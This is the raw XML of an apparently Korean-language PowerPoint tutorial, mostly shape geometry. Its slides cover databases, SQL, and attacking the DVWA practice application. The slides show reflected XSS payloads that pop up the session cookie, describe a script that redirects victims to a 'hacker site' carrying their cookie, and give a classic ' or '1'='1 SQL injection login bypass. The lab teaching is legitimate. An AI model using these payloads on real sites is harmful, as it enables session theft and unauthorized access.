                  <a:gd name="T1" fmla="*/ 14 h 99"/>
                  <a:gd name="T2" fmla="*/ 51 w 83"/>
                  <a:gd name="T3" fmla="*/ 13 h 99"/>
                  <a:gd name="T4" fmla="*/ 60 w 83"/>
                  <a:gd name="T5" fmla="*/ 11 h 99"/>
                  <a:gd name="T6" fmla="*/ 63 w 83"/>
                  <a:gd name="T7" fmla="*/ 7 h 99"/>
                  <a:gd name="T8" fmla="*/ 63 w 83"/>
                  <a:gd name="T9" fmla="*/ 4 h 99"/>
                  <a:gd name="T10" fmla="*/ 65 w 83"/>
                  <a:gd name="T11" fmla="*/ 1 h 99"/>
                  <a:gd name="T12" fmla="*/ 74 w 83"/>
                  <a:gd name="T13" fmla="*/ 0 h 99"/>
                  <a:gd name="T14" fmla="*/ 82 w 83"/>
                  <a:gd name="T15" fmla="*/ 0 h 99"/>
                  <a:gd name="T16" fmla="*/ 72 w 83"/>
                  <a:gd name="T17" fmla="*/ 76 h 99"/>
                  <a:gd name="T18" fmla="*/ 65 w 83"/>
                  <a:gd name="T19" fmla="*/ 83 h 99"/>
                  <a:gd name="T20" fmla="*/ 57 w 83"/>
                  <a:gd name="T21" fmla="*/ 90 h 99"/>
                  <a:gd name="T22" fmla="*/ 45 w 83"/>
                  <a:gd name="T23" fmla="*/ 95 h 99"/>
                  <a:gd name="T24" fmla="*/ 31 w 83"/>
                  <a:gd name="T25" fmla="*/ 97 h 99"/>
                  <a:gd name="T26" fmla="*/ 13 w 83"/>
                  <a:gd name="T27" fmla="*/ 98 h 99"/>
                  <a:gd name="T28" fmla="*/ 2 w 83"/>
                  <a:gd name="T29" fmla="*/ 96 h 99"/>
                  <a:gd name="T30" fmla="*/ 0 w 83"/>
                  <a:gd name="T31" fmla="*/ 91 h 99"/>
                  <a:gd name="T32" fmla="*/ 0 w 83"/>
                  <a:gd name="T33" fmla="*/ 84 h 99"/>
                  <a:gd name="T34" fmla="*/ 9 w 83"/>
                  <a:gd name="T35" fmla="*/ 63 h 99"/>
                  <a:gd name="T36" fmla="*/ 15 w 83"/>
                  <a:gd name="T37" fmla="*/ 42 h 99"/>
                  <a:gd name="T38" fmla="*/ 18 w 83"/>
                  <a:gd name="T39" fmla="*/ 26 h 99"/>
                  <a:gd name="T40" fmla="*/ 18 w 83"/>
                  <a:gd name="T41" fmla="*/ 21 h 99"/>
                  <a:gd name="T42" fmla="*/ 22 w 83"/>
                  <a:gd name="T43" fmla="*/ 16 h 99"/>
                  <a:gd name="T44" fmla="*/ 28 w 83"/>
                  <a:gd name="T45" fmla="*/ 14 h 99"/>
                  <a:gd name="T46" fmla="*/ 36 w 83"/>
                  <a:gd name="T47" fmla="*/ 14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3"/>
                  <a:gd name="T73" fmla="*/ 0 h 99"/>
                  <a:gd name="T74" fmla="*/ 83 w 83"/>
                  <a:gd name="T75" fmla="*/ 99 h 9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3" h="99">
                    <a:moveTo>
                      <a:pt x="36" y="14"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="51" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="1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72" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="14"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="404040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0" name="Freeform 288">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED73E9FB-3376-459C-80CB-43A5B79E2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2333"/>
                <a:ext cx="67" cy="87"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 23 w 67"/>
                  <a:gd name="T1" fmla="*/ 17 h 87"/>
                  <a:gd name="T2" fmla="*/ 35 w 67"/>
                  <a:gd name="T3" fmla="*/ 17 h 87"/>
                  <a:gd name="T4" fmla="*/ 48 w 67"/>
                  <a:gd name="T5" fmla="*/ 15 h 87"/>
                  <a:gd name="T6" fmla="*/ 56 w 67"/>
                  <a:gd name="T7" fmla="*/ 11 h 87"/>
                  <a:gd name="T8" fmla="*/ 61 w 67"/>
                  <a:gd name="T9" fmla="*/ 7 h 87"/>
                  <a:gd name="T10" fmla="*/ 66 w 67"/>
                  <a:gd name="T11" fmla="*/ 0 h 87"/>
                  <a:gd name="T12" fmla="*/ 57 w 67"/>
                  <a:gd name="T13" fmla="*/ 66 h 87"/>
                  <a:gd name="T14" fmla="*/ 51 w 67"/>
                  <a:gd name="T15" fmla="*/ 72 h 87"/>
                  <a:gd name="T16" fmla="*/ 46 w 67"/>
                  <a:gd name="T17" fmla="*/ 78 h 87"/>
                  <a:gd name="T18" fmla="*/ 38 w 67"/>
                  <a:gd name="T19" fmla="*/ 81 h 87"/>
                  <a:gd name="T20" fmla="*/ 31 w 67"/>
                  <a:gd name="T21" fmla="*/ 83 h 87"/>
                  <a:gd name="T22" fmla="*/ 23 w 67"/>
                  <a:gd name="T23" fmla="*/ 84 h 87"/>
                  <a:gd name="T24" fmla="*/ 15 w 67"/>
                  <a:gd name="T25" fmla="*/ 86 h 87"/>
                  <a:gd name="T26" fmla="*/ 6 w 67"/>
                  <a:gd name="T27" fmla="*/ 86 h 87"/>
                  <a:gd name="T28" fmla="*/ 2 w 67"/>
                  <a:gd name="T29" fmla="*/ 84 h 87"/>
                  <a:gd name="T30" fmla="*/ 0 w 67"/>
                  <a:gd name="T31" fmla="*/ 81 h 87"/>
                  <a:gd name="T32" fmla="*/ 0 w 67"/>
                  <a:gd name="T33" fmla="*/ 76 h 87"/>
                  <a:gd name="T34" fmla="*/ 6 w 67"/>
                  <a:gd name="T35" fmla="*/ 65 h 87"/>
                  <a:gd name="T36" fmla="*/ 16 w 67"/>
                  <a:gd name="T37" fmla="*/ 25 h 87"/>
                  <a:gd name="T38" fmla="*/ 18 w 67"/>
                  <a:gd name="T39" fmla="*/ 19 h 87"/>
                  <a:gd name="T40" fmla="*/ 23 w 67"/>
                  <a:gd name="T41" fmla="*/ 17 h 8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7"/>
                  <a:gd name="T64" fmla="*/ 0 h 87"/>
                  <a:gd name="T65" fmla="*/ 67 w 67"/>
                  <a:gd name="T66" fmla="*/ 87 h 8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7" h="87">
                    <a:moveTo>
                      <a:pt x="23" y="17"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="35" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="84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6" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="17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1" name="Freeform 289">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC9B760E-64A8-4028-A286-5F36B1884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" y="2439"/>
                <a:ext cx="17" cy="79"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 5 w 17"/>
                  <a:gd name="T1" fmla="*/ 0 h 79"/>
                  <a:gd name="T2" fmla="*/ 0 w 17"/>
                  <a:gd name="T3" fmla="*/ 4 h 79"/>
                  <a:gd name="T4" fmla="*/ 5 w 17"/>
                  <a:gd name="T5" fmla="*/ 6 h 79"/>
                  <a:gd name="T6" fmla="*/ 9 w 17"/>
                  <a:gd name="T7" fmla="*/ 13 h 79"/>
                  <a:gd name="T8" fmla="*/ 5 w 17"/>
                  <a:gd name="T9" fmla="*/ 19 h 79"/>
                  <a:gd name="T10" fmla="*/ 9 w 17"/>
                  <a:gd name="T11" fmla="*/ 54 h 79"/>
                  <a:gd name="T12" fmla="*/ 9 w 17"/>
                  <a:gd name="T13" fmla="*/ 77 h 79"/>
                  <a:gd name="T14" fmla="*/ 16 w 17"/>
                  <a:gd name="T15" fmla="*/ 78 h 79"/>
                  <a:gd name="T16" fmla="*/ 16 w 17"/>
                  <a:gd name="T17" fmla="*/ 31 h 79"/>
                  <a:gd name="T18" fmla="*/ 9 w 17"/>
                  <a:gd name="T19" fmla="*/ 19 h 79"/>
                  <a:gd name="T20" fmla="*/ 9 w 17"/>
                  <a:gd name="T21" fmla="*/ 15 h 79"/>
                  <a:gd name="T22" fmla="*/ 16 w 17"/>
                  <a:gd name="T23" fmla="*/ 13 h 79"/>
                  <a:gd name="T24" fmla="*/ 9 w 17"/>
                  <a:gd name="T25" fmla="*/ 7 h 79"/>
                  <a:gd name="T26" fmla="*/ 5 w 17"/>
                  <a:gd name="T27" fmla="*/ 5 h 79"/>
                  <a:gd name="T28" fmla="*/ 5 w 17"/>
                  <a:gd name="T29" fmla="*/ 0 h 7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79"/>
                  <a:gd name="T47" fmla="*/ 17 w 17"/>
                  <a:gd name="T48" fmla="*/ 79 h 7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79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9" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="7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2" name="Freeform 290">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{096AD5B1-AF10-4C39-A649-CB83D6238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243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16 h 17"/>
                  <a:gd name="T4" fmla="*/ 13 w 17"/>
                  <a:gd name="T5" fmla="*/ 16 h 17"/>
                  <a:gd name="T6" fmla="*/ 16 w 17"/>
                  <a:gd name="T7" fmla="*/ 16 h 17"/>
                  <a:gd name="T8" fmla="*/ 11 w 17"/>
                  <a:gd name="T9" fmla="*/ 8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8" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1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  <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="473" name="Freeform 291">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99442213-8E20-4490-9B25-DEE5FD73B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2" y="2225"/>
                <a:ext cx="22" cy="49"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 21 w 22"/>
                  <a:gd name="T1" fmla="*/ 0 h 49"/>
                  <a:gd name="T2" fmla="*/ 17 w 22"/>
                  <a:gd name="T3" fmla="*/ 1 h 49"/>
                  <a:gd name="T4" fmla="*/ 18 w 22"/>
                  <a:gd name="T5" fmla="*/ 4 h 49"/>
                  <a:gd name="T6" fmla="*/ 16 w 22"/>
                  <a:gd name="T7" fmla="*/ 2 h 49"/>
                  <a:gd name="T8" fmla="*/ 16 w 22"/>
                  <a:gd name="T9" fmla="*/ 5 h 49"/>
                  <a:gd name="T10" fmla="*/ 12 w 22"/>
                  <a:gd name="T11" fmla="*/ 5 h 49"/>
                  <a:gd name="T12" fmla="*/ 16 w 22"/>
                  <a:gd name="T13" fmla="*/ 7 h 49"/>
                  <a:gd name="T14" fmla="*/ 8 w 22"/>
                  <a:gd name="T15" fmla="*/ 8 h 49"/>
                  <a:gd name="T16" fmla="*/ 12 w 22"/>
                  <a:gd name="T17" fmla="*/ 12 h 49"/>
                  <a:gd name="T18" fmla="*/ 5 w 22"/>
                  <a:gd name="T19" fmla="*/ 12 h 49"/>
                  <a:gd name="T20" fmla="*/ 10 w 22"/>
                  <a:gd name="T21" fmla="*/ 15 h 49"/>
                  <a:gd name="T22" fmla="*/ 4 w 22"/>
                  <a:gd name="T23" fmla="*/ 15 h 49"/>
                  <a:gd name="T24" fmla="*/ 7 w 22"/>
                  <a:gd name="T25" fmla="*/ 20 h 49"/>
                  <a:gd name="T26" fmla="*/ 2 w 22"/>
                  <a:gd name="T27" fmla="*/ 19 h 49"/>
                  <a:gd name="T28" fmla="*/ 6 w 22"/>
                  <a:gd name="T29" fmla="*/ 23 h 49"/>
                  <a:gd name="T30" fmla="*/ 0 w 22"/>
                  <a:gd name="T31" fmla="*/ 24 h 49"/>
                  <a:gd name="T32" fmla="*/ 5 w 22"/>
                  <a:gd name="T33" fmla="*/ 27 h 49"/>
                  <a:gd name="T34" fmla="*/ 0 w 22"/>
                  <a:gd name="T35" fmla="*/ 29 h 49"/>
                  <a:gd name="T36" fmla="*/ 6 w 22"/>
                  <a:gd name="T37" fmla="*/ 31 h 49"/>
                  <a:gd name="T38" fmla="*/ 0 w 22"/>
                  <a:gd name="T39" fmla="*/ 34 h 49"/>
                  <a:gd name="T40" fmla="*/ 6 w 22"/>
                  <a:gd name="T41" fmla="*/ 36 h 49"/>
                  <a:gd name="T42" fmla="*/ 1 w 22"/>
                  <a:gd name="T43" fmla="*/ 40 h 49"/>
                  <a:gd name="T44" fmla="*/ 6 w 22"/>
                  <a:gd name="T45" fmla="*/ 42 h 49"/>
                  <a:gd name="T46" fmla="*/ 4 w 22"/>
                  <a:gd name="T47" fmla="*/ 44 h 49"/>
                  <a:gd name="T48" fmla="*/ 8 w 22"/>
                  <a:gd name="T49" fmla="*/ 48 h 4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2"/>
                  <a:gd name="T76" fmla="*/ 0 h 49"/>
                  <a:gd name="T77" fmla="*/ 22 w 22"/>
                  <a:gd name="T78" fmla="*/ 49 h 4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2" h="49">
                    <a:moveTo>
                      <a:pt x="21" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17" y="1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6" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="12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2" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="29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6" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="48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he-I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ar-SA" altLang="ko-KR"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="341" name="AutoShape 292">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE55D6FA-4302-4BE2-8BC7-788771A60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109" y="3324196"/>
              <a:ext cx="533400" cy="381000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95959"/>
                </a:gs>
                <a:gs pos="50000">
                  <a:srgbClr val="C0C0C0"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="595959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ar-SA" altLang="ko-KR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="342" name="AutoShape 293">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB9EA610-DA5D-4A86-9746-6C92D5507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309" y="3476596"/>
              <a:ext cx="533400" cy="381000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95959"/>
                </a:gs>
                <a:gs pos="50000">
                  <a:srgbClr val="C0C0C0"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="595959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ar-SA" altLang="ko-KR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="343" name="Text Box 297">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18D788C7-7A3D-43DB-AFFD-7BBCC0B64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6909" y="3628996"/>
              <a:ext cx="1128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200">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Financial data</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="344" name="Text Box 298">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16B49D67-3A62-4052-B224-870A29ADB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6909" y="4467196"/>
              <a:ext cx="9953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200">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Private data</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="345" name="Text Box 300">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C08229B-CCB4-4F02-B230-F9C6664E8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3709" y="4471959"/>
              <a:ext cx="11811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200">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Customer data</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="346" name="Line 301">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A708BDBF-2018-4479-8333-665E2CB70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2309" y="1774796"/>
              <a:ext cx="76200" cy="1384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7" name="Text Box 302">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85E5250B-76D2-49B7-AA42-5350E8450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897" y="1465234"/>
              <a:ext cx="11366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he-I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0" hangingPunct="0"/>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1400">
                  <a:solidFill>
                    <a:srgbClr val="663300"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>E-commerce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27F197-2AE6-4F8C-92BB-6028FFE4BD09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7694749" y="2240531"/>
            <a:ext cx="3990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데이터베이스</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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  <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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여러 사람이 공유하여 사용할 목적으로 통합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관리하는 데이터의 집합이다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a고딕17" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="a고딕17" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>2. 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SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a: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관계형 데이터베이스 관리 시스템의 데이터를 관리하기 위해 설계된 특수 목적의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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프로그램밍</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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언어이다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7849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DVWA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사이트 접속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3EDA7-0A74-4913-8ADA-EFCC8FE3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17" y="2141409"/>
            <a:ext cx="4955565" cy="3587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849E6-E15D-4DD4-BF35-785D96BD9CF3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021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DVWA Security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클릭하여 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level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Low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낮추어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주기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2104F1-37C6-4D5A-BB11-D094F7820A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58257" y="2115820"/>
            <a:ext cx="5731510" cy="3503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55E2F-9B18-423D-AB91-036AC3105AED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37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what’s your name?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이라는 문장에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hyem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치고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submit</a:t>
            </a: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그러면 아래에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Hello hyem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이라는 입력 값이 그대로 리턴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9AC534-5AA9-4FCA-AFB1-6DCA009E9C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8201" y="2547415"/>
            <a:ext cx="6615597" cy="2677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5099E-6AE4-4E81-9DE7-60E2D98984DE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08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크로스 사이트 스크립팅 취약점을 찾기 위해서 스크립트를 폼에 입력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&lt;script&gt;alert(1)&lt;/script&gt;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후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submit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6EAF23-7854-41F7-8102-FA49FEE165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52913" y="2847975"/>
            <a:ext cx="6663690" cy="2087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21438-ADF1-4BCC-B6AE-286DC9300E7E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659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위의 사진은 스크립트가 웹 브라우저에서 실행되었다는 것을 의미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(= xss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공격이 가능하다는 뜻이기도 함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2BCCA3-4A47-47C5-9877-3EC90B05EC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55540" y="2281626"/>
            <a:ext cx="5045075" cy="2653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855D3-0FCE-4240-BF19-00B11CBC44B7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4997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두번째로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&lt;script&gt;alert(document.cookie)&lt;/script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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submit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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해보면</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="4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A26B3E-2762-4756-AF3C-E2A589E67E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3693" y="2455668"/>
            <a:ext cx="7584614" cy="261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AEB47-0A87-43F4-9880-11C3E7A83779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896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다음과 같은 팝업창이 뜨면서 쿠키의 값이 출력됨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AB7E15-0CAB-41D8-AD50-C8F13D082A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58257" y="2761297"/>
            <a:ext cx="5731510" cy="262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41A130-3B1C-41F2-9AC0-F139D0C4A8B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="331756" y="203626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199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2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칼리를 해커 입장으로 두고 터미널에서 웹 서버의 로그를 출력하는 명령어 실행</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="22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F6D0EC-8C01-46E5-BD96-B95CC8ABF4AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="3952" t="1334" r="4853" b="5944"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1188720" y="2438400"/>
            <a:ext cx="4038600" cy="2758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64DC49-A124-4CC2-9221-2AF722ECEA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7627" y="2506979"/>
            <a:ext cx="4715653" cy="275844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BF14-03FC-4150-AFA3-3E464FDD7FFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5440680" y="3817620"/>
            <a:ext cx="65532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33795C-4812-4955-9BF1-FE2D6DD8B74D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682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명령어를 자세하게 보면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tail –f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옵션을 이용하는데 이 옵션을 사용하면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이후에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DVWA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에서 발생하는 로그가 이어서 출력된다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EDD29D-2DB6-48BB-9260-E18988A57044}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect r="36057" b="92679"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1063133" y="2575719"/>
            <a:ext cx="10065734" cy="1706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45CF0-4926-4D72-941E-6495726D0A5E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6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이렇게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location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설정해주어 해커 사이트로 리 다이렉트를 시켜주고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쿠키의 값도 찍어줄 수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있는 스크립트를 짠 다음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D9C0B7-7FC7-4495-91C9-7DD45CE918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5512" y="2904648"/>
            <a:ext cx="7800975" cy="1536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14D40-81B6-46E8-994F-CD5C729B4C79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62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60B7C-9D7C-490C-9A9D-C86C80397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0" y="2387983"/>
            <a:ext cx="4163628" cy="2985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06AED-5E38-4FB5-9933-853DA39E0D2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1334612" y="2310944"/>
            <a:ext cx="55600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accent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개발자가 원한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent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query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pP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SELECT * from users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pP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WHERE username = ‘admin’ and </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pP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Password = ‘123’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="20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Injected SQL code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009900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SELECT * from users where username = ‘admin’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pP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and password = ‘XXX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF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or ‘1’=‘1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="20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E6DA8-DC65-4008-B05C-07FB390F3957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2AFB2-B7D3-487C-A414-2BFCBF9ECCA3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24C64-8206-4B24-BD53-9D3D129CFFAF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SQL Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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공격 시나리오</a:t>
            </a:r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716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이전의 작성한 스크립트를 복붙 후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submit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누르기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42BBF2-6088-4263-A014-6462CEC782E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect b="11556"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2402204" y="2468692"/>
